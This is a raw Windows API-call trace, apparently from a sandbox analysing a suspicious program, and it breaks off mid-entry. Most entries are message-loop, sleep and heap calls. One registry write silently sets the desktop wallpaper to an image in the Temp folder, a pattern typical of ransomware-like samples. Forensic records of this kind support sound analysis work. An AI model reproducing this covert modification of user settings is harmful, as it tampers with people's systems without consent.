[0286.495] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.495] Sleep (dwMilliseconds=0xa) [0286.511] timeGetTime () returned 0x47aaa [0286.511] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.511] Sleep (dwMilliseconds=0xa) [0286.535] timeGetTime () returned 0x47ab9 [0286.535] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.535] Sleep (dwMilliseconds=0xa) [0286.541] timeGetTime () returned 0x47ac9 [0286.541] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.541] Sleep (dwMilliseconds=0xa) [0286.557] timeGetTime () returned 0x47ad9 [0286.557] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.557] Sleep (dwMilliseconds=0xa) [0286.575] timeGetTime () returned 0x47ae8 [0286.575] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.575] Sleep (dwMilliseconds=0xa) [0286.588] timeGetTime () returned 0x47af8 [0286.588] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.588] Sleep (dwMilliseconds=0xa) [0286.604] timeGetTime () returned 0x47b07 [0286.604] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0286.604] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0286.604] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0286.604] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0286.604] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0286.604] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.605] Sleep (dwMilliseconds=0xa) [0286.620] timeGetTime () returned 0x47b17 [0286.620] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.620] Sleep (dwMilliseconds=0xa) [0286.635] timeGetTime () returned 0x47b27 [0286.635] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.635] Sleep (dwMilliseconds=0xa) [0286.651] timeGetTime () returned 0x47b36 [0286.651] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.651] Sleep (dwMilliseconds=0xa) [0286.666] timeGetTime () returned 0x47b46 [0286.666] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.666] Sleep (dwMilliseconds=0xa) [0286.683] timeGetTime () returned 0x47b55 [0286.683] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.683] Sleep (dwMilliseconds=0xa) [0286.697] timeGetTime () returned 0x47b65 [0286.697] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.697] Sleep (dwMilliseconds=0xa) [0286.713] timeGetTime () returned 0x47b75 [0286.713] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.713] Sleep (dwMilliseconds=0xa) [0286.728] timeGetTime () returned 0x47b84 [0286.728] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.728] Sleep (dwMilliseconds=0xa) [0286.744] timeGetTime () returned 0x47b94 [0286.744] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0286.744] Sleep (dwMilliseconds=0xa) [0286.762] timeGetTime () returned 0x47ba3 [0286.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0286.762] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0286.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0286.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0286.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0286.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0286.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0286.763] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0286.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0286.763] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0286.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0286.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0286.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0286.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0286.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0286.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0286.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0286.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0286.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0286.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0286.765] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0286.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0286.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0286.766] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0286.766] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0286.766] RegCloseKey (hKey=0x294) returned 0x0 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0286.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0286.767] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0286.767] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0286.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0286.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0286.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0286.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0286.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0286.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0286.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0286.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0286.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0286.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0286.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0286.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0286.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0286.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0286.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0286.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0286.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0286.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0286.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0286.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0286.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0286.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0286.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0286.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0286.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0286.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0286.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0286.771] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0286.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0286.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0286.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0286.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0286.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0286.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0286.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0286.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0286.772] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0286.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0286.772] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0286.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0286.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0286.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0286.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0286.773] RtlAllocateHeap 